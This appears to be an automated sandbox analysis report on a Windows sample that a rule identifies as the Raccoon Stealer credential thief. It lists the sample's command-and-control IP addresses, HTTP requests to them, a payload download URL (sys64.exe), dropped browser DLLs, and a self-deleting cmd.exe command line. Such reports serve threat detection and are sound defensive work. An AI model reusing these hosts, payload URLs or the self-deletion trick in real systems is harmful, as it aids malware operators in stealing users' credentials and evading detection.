d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.54.238
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.54.238
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.54.238
Source: unknown TCP traffic detected without corresponding DNS query: 193.38.54.238
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 74.119.192.122
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.240
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.69
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/sys64.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmp String found in binary or memory: http://188.127.251.217/sys64.exe7e1bbc7bd
Source: Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316201744.000000000055A000.00000004.00000001.sdmp String found in binary or memory: http://193119.192.122/
Source: Tk6dsSEyOC.exe, 00000000.00000003.316146963.000000000056C000.00000004.00000001.sdmp String found in binary or memory: http://74.119.192.122/
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427854051.0000000002E8E000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmp String found in binary or memory: http://91.219.236.69/
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp String found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp String found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b04
Source: Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmp String found in binary or memory: http://91.219.236.69:80/_netfx4-system.web.routing_b03f5f7f11d50a3a_4.0.15671.0_none_a9bac3c753caa48
Source: ldap60.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ldap60.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, nssckbi.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ldap60.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: ldap60.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ldap60.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ldap60.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ldap60.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://ocsp.accv.es0
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: ldap60.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://repository.swisssign.com/0
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ldap60.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ldap60.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.0.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: ldap60.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
Source: unknown DNS traffic detected: queries for: t.me
Source: global traffic HTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: global traffic HTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

System Summary:

barindex
Uses 32bit PE files
Source: Tk6dsSEyOC.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041C217 0_2_0041C217
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041E6DA 0_2_0041E6DA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040E727 0_2_0040E727
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00410AD2 0_2_00410AD2
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434CB5 0_2_00434CB5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041AD32 0_2_0041AD32
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043CD97 0_2_0043CD97
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041D364 0_2_0041D364
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040D560 0_2_0040D560
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040F78B 0_2_0040F78B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00415816 0_2_00415816
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00427AAA 0_2_00427AAA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00429B40 0_2_00429B40
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0040DC7B 0_2_0040DC7B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0041DD0B 0_2_0041DD0B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00435E43 0_2_00435E43
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0044C1E6 0_2_0044C1E6
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043C20A 0_2_0043C20A
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042035B 0_2_0042035B
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004103F7 0_2_004103F7
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0044C443 0_2_0044C443
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004185E7 0_2_004185E7
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0042862C 0_2_0042862C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: String function: 00466770 appears 89 times
PE file does not import any functions
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373328236.0000000002EE2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.483474987.000000006FD92000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.376545109.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427974547.0000000002EE6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.372509130.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427918812.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000002.483336296.000000006EEEB000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.376567749.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.378183747.0000000002EDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp Binary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373424728.0000000002EE2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
Source: Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmp Binary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
PE file contains strange resources
Source: Tk6dsSEyOC.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Tk6dsSEyOC.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Source: Tk6dsSEyOC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Tk6dsSEyOC.exe Virustotal: Detection: 49%
Source: Tk6dsSEyOC.exe ReversingLabs: Detection: 54%
Source: Tk6dsSEyOC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Tk6dsSEyOC.exe "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File created: C:\Users\user\AppData\Local\Temp\KVOjaLhCnJ.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/68@1/8
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 0_2_004279D5
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
